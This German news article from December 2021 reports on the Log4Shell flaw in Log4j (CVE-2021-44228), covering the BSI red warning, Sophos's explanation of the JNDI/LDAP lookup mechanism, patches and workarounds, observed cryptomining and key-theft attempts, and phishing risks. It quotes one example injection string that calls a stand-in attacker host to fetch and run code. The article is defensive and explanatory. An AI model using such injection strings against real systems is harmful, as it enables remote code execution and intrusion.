Log4Shell führt zu Warnstufe Rot

13. Dezember 2021

Die kritische Schwachstelle (Log4Shell) in der weit verbreiteten Java-Bibliothek Log4j führt nach Einschätzung des Bundesamts für Sicherheit in der Informationstechnik (BSI) zu einer extrem kritischen Bedrohungslage. Das BSI hat sogar seine bestehende Cyber-Sicherheitswarnung auf die Warnstufe Rot hochgestuft. Ursächlich für diese Einschätzung ist die sehr weite Verbreitung des betroffenen Produkts und die damit verbundenen Auswirkungen auf unzählige weitere Produkte.

Die Schwachstelle ist zudem trivial ausnutzbar, ein Proof-of-Concept ist öffentlich verfügbar. Eine erfolgreiche Ausnutzung der Schwachstelle ermöglicht eine vollständige Übernahme des betroffenen Systems. Dem BSI sind welt- und deutschlandweite Massen-Scans sowie versuchte Kompromittierungen bekannt. Auch erste erfolgreiche Kompromittierungen werden öffentlich gemeldet.

Anzeige
CS espresso series

Das ganze Ausmaß der Bedrohungslage ist nach Einschätzung des BSI aktuell nicht abschließend feststellbar. Zwar gibt es für die betroffene Java-Bibliothek Log4j ein Sicherheits-Update, allerdings müssen alle Produkte, die Log4j verwenden, ebenfalls angepasst werden. Welche Produkte verwundbar sind und für welche es bereits Updates gibt, ist derzeit nicht vollständig überschaubar und daher im Einzelfall zu prüfen.

Das BSI empfiehlt insbesondere Unternehmen und Organisationen, die in der Cyber-Sicherheitswarnung skizzierten Abwehrmaßnahmen umzusetzen. Darüber hinaus sollten die Detektions- und Reaktionsfähigkeiten kurzfristig erhöht werden, um die eigenen Systeme angemessen überwachen zu können. Sobald Updates für einzelne Produkte verfügbar sind, sollten diese eingespielt werden. Darüber hinaus sollten alle Systeme, die verwundbar waren, auf eine Kompromittierung untersucht werden.

Neben den gravierenden Auswirkungen für Unternehmen stellt die Zero-Day-Lücke laut der Security-Experten von Sophos auch für Privatpersonen eine nicht zu unterschätzende Gefahr dar und ruft garantiert Trittbrettfahrer auf den Plan: „Der entscheidende Punkt bei der Log4Shell-Attacke ist, dass der Server automatisch Code ausführt. Was auch immer ein Angreifer einem Server mit der Sicherheitslücke auftragen will, er kann es tun. Deshalb ist es enorm wichtig, so schnell wie möglich zu patchen, denn viele Leute da draußen, die nichts Gutes im Sinn haben, versuchen bereits auszutesten, welche Server noch angreifbar sind“, bringt Paul Ducklin, IT-Security-Experte bei Sophos, die Bedrohung auf den Punkt.

Der Name Log4Shell bezieht sich auf die Tatsache, dass der ausgenutzte Fehler in einer beliebten Java-Codebibliothek namens Log4j (Logging for Java) enthalten ist, und darauf, dass Angreifer, wenn sie die Lücke erfolgreich ausnutzen, praktisch eine Shell erhalten – also die Möglichkeit, jeden System Code ihrer Wahl auszuführen. Und als ob diese Kommandogewalt noch nicht genug wäre, wurde die Sicherheitslücke als Zero-Day-Lücke getwittert, also als Sicherheitsfehler, der dokumentiert wird, bevor ein Patch zur Verfügung steht. Zudem wurde das Proof-of-Concept (PoC) auf GitHub veröffentlicht und das Problem damit weltweit bekannt, während es noch ungepatcht war.

Unsachgemäße Eingabevalidierung

Die Schwachstelle, mittlerweile offiziell als CVE-2021-44228 bezeichnet, hat ihren Ursprung in einer harmlosen Anfragesendung an einen anfälligen Server, die einige Daten – beispielsweise einen HTTP-Header – einschließt, von denen die Cyber-Kriminellen erwarten (oder sogar wissen), dass der Server sie in seine Logdatei schreibt. Die so eingeschleusten Daten bilden eine versteckte „Sprengfalle“, da der Server, während er die Daten in ein für die Protokollierung geeignetes Format umwandelt, einen Web-Download als integralen Bestandteil der Erstellung des erforderlichen Protokolleintrags startet. Diese Aktion hat es in sich, denn wenn die zurückkommenden Daten ein gültiges Java-Programm sind (eine .class-Datei, im Jargon), dann führt der Server diese Datei aus, um ihm bei der Generierung der Protokolldaten zu helfen.

Der Trick besteht darin, dass ungepatchte Versionen der Log4j-Bibliothek standardmäßig Protokollierungsanforderungen ermöglichen, um allgemeine LDAP-Suchanfragen (LDAP ist das Lightweight Directory Access Protocol, ein Protokoll für den Zugriff auf Verzeichnisdienste) sowie verschiedene andere Online-Suchen auszulösen. Dieses „Feature“ existiert, um dabei zu helfen, nicht sehr nützliche Daten, zum Beispiel Benutzer-IDs wie OZZJ5JYPVK, in menschenlesbare Informationen umzuwandeln, die in Ihrem Netzwerk sinnvoll sind, wie beispielsweise Peter Müller. Diese Anfragen erfolgen über ein häufig verwendetes Java-Toolkit namens JNDI, kurz für Java Naming and Directory Interface.

Dieses Vorgehen ist so lange tragbar, wie die protokollierten Daten, die eine Ausführung von serverseitigem Code auslösen können, auf Verzeichnisserver im eigenen Netzwerk beschränkt sind. Allerdings sind viel Server nicht entsprechend eingerichtet, und so könnten bösartige „Logsploiter“ versuchen, Text wie {$jndi:ldap://dodgy.example:389/badcode} in die Daten einzubetten, von denen sie erwarten, dass Unternehmen sie protokollieren und Server dabei automatisch:

  • JNDI verwenden, um eine LDAP-Anfrage an den angegebenen Port (in unserem Beispiel 389) auf dem angegebenen nicht vertrauenswürdigen externen Server zu senden,
  • den nicht vertrauenswürdigen Inhalt in den Standort Badcode abrufen, sowie
  • den vom Angreifer bereitgestellten Code ausführen, um „Hilfe“ bei der Protokollierung zu erhalten.

Einfach ausgedrückt, wird dieses Vorgehen im Fachjargon als nicht authentifizierte Remote Code Execution (RCE) bezeichnet. Ohne sich anzumelden oder ein Passwort oder Zugriffstoken zu benötigen, könnten Cyber-Kriminelle eine harmlos aussehende Anfrage verwenden, um Server dazu zu bringen, sich zu melden, ihren Code herunterzuladen und sich so mit ihrer Malware zu infizieren. Je nachdem, welche Zugriffsrechte ein Server auf das interne Netzwerk hat, kann eine solche RCE Cyber-Kriminellen dabei helfen, eine Vielzahl schädlicher Aufgaben auszuführen.

Genau das macht die aktuelle Schachstelle Log4Shell so gefährlich. Angreifer können theoretisch Daten vom Server selbst abfließen lassen; Details über das interne Netzwerk erfahren, Daten auf dem Server ändern; Daten von anderen Servern im Netzwerk exfiltrieren; zusätzliche Hintertüren auf dem Server oder dem Netzwerk für zukünftige Angriffe einrichten oder weitere Malware wie Netzwerk-Snooper, Memory Scraper, Data Stealer und Cryptominer installieren.

Der Lizenzgeber Apache hat zu diesem Thema einen praktischen Sicherheitshinweis veröffentlicht. Sophos fasst dazu das Wichtigste zusammen:

  • Upgrade auf Apache Log4j 2.15.0. Wenn Sie Log4j verwenden, ist jede 2.x-Version von 2.14.1 und früher anscheinend standardmäßig anfällig. (Wenn Sie noch Log4j 1.x verwenden, ist ebenfalls ein Upgrade Pflicht, da es nicht mehr mit Updates versorgt wird).
  • Blockieren der Möglichkeit, dass JNDI Anfragen an nicht vertrauenswürdige Server stellt. Wenn Sie nicht aktualisieren können, aber Log4j 2.10.0 oder höher verwenden, können Sie den Konfigurationswert log4j2.formatMsgNoLookups auf true setzen, was das Ausgehen von LDAP und ähnlichen Abfragen von vornherein verhindert.
  • Überprüfung der verwendeten Java-Laufzeit. Der zugrunde liegende Java Build, den Sie nutzen, verhindert möglicherweise, dass dieser Fehler basierend auf seiner eigenen Standardkonfiguration ausgelöst wird. Apache listet beispielsweise Oracle Java 8u121 explizit als Schutz vor diesem RCE auf.

Aus der bisherigen Beobachtung zu dieser Schachstelle sind bei Sophos folgend Punkte aufgefallen:

  • Es wurde eine rasche Zunahme von Angriffen verzeichnet, die die Sicherheitslücke ausnutzen oder versuchen, diese auszunutzen. Bisher wurden Hunderttausende von Versuchen erkannt.
  • Cryptomining-Botnetze gehören momentan zu den häufigsten Angriffsformen. Dabei konzentrieren sich die Botnetze auf Linux-Serverplattformen, die der Schwachstelle besonders ausgesetzt sind.
  • Sophos hat auch Versuche gesehen, Informationen aus Diensten zu extrahieren, einschließlich Amazon-Web-Services-Schlüsseln und anderen privaten Daten.
  • Sophos hat festgestellt, dass Versuche, Netzwerkdienste auszunutzen, mit der Suche nach verschiedenen Service-Typen beginnen. Etwa 90 Prozent der von Sophos erkannten „Testläufe“ konzentrierten sich auf das Lightweight Directory Access Protocol (LDAP). Eine kleinere Anzahl zielte auf Javas Remote Interface (RMI) ab, wobei es in diesem Bereich anscheinend eine größere Vielfalt einzigartiger, RMI-bezogener Versuche gibt.
  • Bei Sophos erwartet man, dass Angreifer in den kommenden Tagen und Wochen ihre Angriffsmethoden intensivieren und diversifizieren, einschließlich der Möglichkeit, Ransomware zu nutzen.

Log4Shell bedeutet nicht nur Alarmstufe Rot für Unternehmen, sondern auch private Nutzer können durchaus von den Auswirkungen der Lücke betroffen sein. Das gilt vor allem dann, wenn Privatpersonen Cloud-Server nutzen, die von einem Hosting-Unternehmen oder einem anderen Managed-Service-Provider betrieben werden – sei es ein Blog, ein Forum oder die Familienwebsite.
Hier gilt es nun zunächst einmal herauszufinden, ob diese Services angreifbar und wann Patches geplant sind. Aktuell macht es sicherlich mehr Sinn, auf den entsprechenden Webseiten nach Informationen zu suchen, da die Anbieter höchstwahrscheinlich momentan von Emails überflutet werden.

Zusätzlich sollte auf offizielle Sicherheitswarnungen von genutzten Online-Diensten im Postfach geachtet werden.Aber auch hier gilt es, Vorsicht walten zu lassen! Wenn Nutzer Nachrichten über die aktuelle Sicherheitslücke erhalten – eventuell noch von einem prominenten Serviceanbieter, sollten sie nicht automatisch auf die in der Warnmeldung angegeben Links klicken und auch keine Telefonnummern ohne kritische Prüfung wählen.

Medienwirksame Cyber-Attacken wie Log4Shell rufen schnell Trittbrettfahrer auf den Plan, die die Angst der Nutzer für ihre Phishing-Attacken nutzen wollen. Im Zweifelsfall sollten Nutzer ihren eigenen Weg zur Informationsbeschaffung finden, indem Sie URLs, E-Mail-Adressen oder Telefonnummern verwenden, die sie bereits früher genutzt haben. (rhh)

BSI

Sophos

Lesen Sie auch